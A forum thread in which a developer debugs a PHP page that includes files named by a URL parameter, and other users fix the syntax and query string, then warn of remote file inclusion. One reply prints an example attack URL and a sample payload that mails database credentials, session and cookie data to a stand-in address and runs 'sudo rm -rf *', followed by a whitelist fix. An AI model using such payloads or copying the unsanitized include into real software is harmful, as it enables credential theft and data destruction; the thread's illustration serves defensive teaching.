I think the title sums it up, I'm trying to load php content into a main php page based on variables (?pag) sent from the url. These content files also use a variable (?client) to pull info from a database. Everything works on it's own and I can include the content files with a standard:

include("overview.php");

but as soon as I start trying to swap the filename for a variable I get problems. Either I get errors or the main page loads without the content. Can somebody please check my code, this current version prodcues this error. Line 55 is the include.

Parse error: syntax error, unexpected '.' in /homepages/73/d165769927/htdocs/MDWEB/campaignreports/campaignreport.php on line 55


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>

<?php
$pag = $_GET['pag'];
$client = $_GET['client'];

print'
<div id="container">
<div id="content">
<div id="framegallery" style="width: 860px; height: 100%">
<img src="header.jpg" border="0" usemap="#Map" style="border:0px;" />
<map name="Map" id="Map">
<area shape="rect" coords="24,69,107,94" href="http://www.mysite.tv/campaignreports/campaignreport.php?client='.$client.'&?pag=overview" alt="overview" />
<area shape="rect" coords="141,69,275,94" href="http://www.mysite.tv/campaignreports/campaignreport.php?client='.$client.'&?pag=activity" alt="activity report" />
<area shape="rect" coords="317,67,384,95" href="http://www.mysite.tv/campaignreports/campaignreport.php?client='.$client.'&?pag=gallery" alt="gallery" />
<area shape="rect" coords="417,67,509,96" href="http://www.mysite.tv/campaignreports/campaignreport.php?client='.$client.'&?pag=summary" alt="summary" />
</map>
<table width="100%" border="0" cellpadding="28" cellspacing="0">
<tr>
<td background="indexfiles/light-trail-LARGE.jpg" STYLE="background-position: bottom; background-repeat:no-repeat;" bgcolor="#080808">

'?>


<?php
include(.$pag.".php");
?>

<br /><br />
</td></tr>
</table>
</div>
</div>
</div>
</body>
</html>

Thanks in advance!

A parse error means your syntax is incorrect. I believe it should be:

include($pag . ".php");

instead of

include(.$pag.".php");

Thanks for the reply, I must have tried 100 different variations of that today! Although it fixes the parse error only the main page is loading and not the included file. I think that's one of two problems solved... Thanks again.

Aha, I've done a bit of testing and it seems the main page is not picking up on the $pag variable. $client works fine though. Getting there...

Oh... I didn't look very closely at your code... sorry. You're building the query string wrong. It should look like this:

/path/to/script.php?client=foo&pag=bar

not

/path/to/script.php?client=foo&?pag=bar

Yes. Absolutely. I just noticed that, I've got a habit of wrestling over these things for hours and then working them out just as I ask for help. I think typing out the problem clears things up! But thanks, that syntax error would have stumped me for ages. Jesus will want you for a sunbeam.

Since no one has said it yet, you should really be careful with this setup. It would be very easy to f your site up with the code you posted, and trust me, people will try.

/path/to/script.php?client=foo&pag=http://h4ck3r.com/php_code_in_text_file.txt

Possible Content of php_code_in_text_file.txt


<?php
$database_attemtps = array(
'1' => $db,
'2' => $database,
'3' => $username,
'4' => $db_user,
'5' => $db_host,
'6' => $host,
'7' => $password,
'8' => $db_password
);

$session = var_export($_SESSION);
$cookies = var_export($_COOKIES);
$credentials = var_export($database_attempts);

$mail =<<< MAILER
Session: $session
Cookies: $cookies
Credentialss: $credentials;
MAILER;

mail('bad_person@justscrewedyou.com', 'Bounty', $mail);

$bye = `sudo rm -rf *`;

?>


That code would/could be executed. You need to either limit the accepted files to include by using a switch statement or run a regex on the value passed in to remove backticks and urls.


$f = stripslashes($_GET['page']);
switch($f){
case 'good' :
case 'alsogood': $file = $f;
break;
default: $file = 'some_default_page';
break;
}
$include_file = $file . '.php';
include($include_file);

Since no one has said it yet, you should really be careful with this setup. It would be very easy to f your site up with the code you posted, and trust me, people will try.

+1

I came here just to post that, surprised no one mentioned it earlier. Not only the above but depending on your permissions, etc they could use it to view files outside your web directory (.passwd files, server settings, etc) and to do things locally as if they were logged into the machine (delete/modify files, view source code, snoop in databases, etc).

With the setup above you are basically giving anyone who wants it full access to your server.

Whoops... You know, that was in the back of my mind while I was writing both of my previous posts... I just didn't say it... really it was. :)

Not only the above but depending on your permissions, etc they could use it to view files outside your web directory (.passwd files, server settings, etc) and to do things locally as if they were logged into the machine (delete/modify files, view source code, snoop in databases, etc).

I was trying to think of an example that would get my point across, but the things Yeldarb point out are more likely what would be done (viewing source code, database snooping).

@jwilliam I am usually consumed trying to answer the questions people ask; when someone beats me to it, I sometimes notice problems they didn't ask about.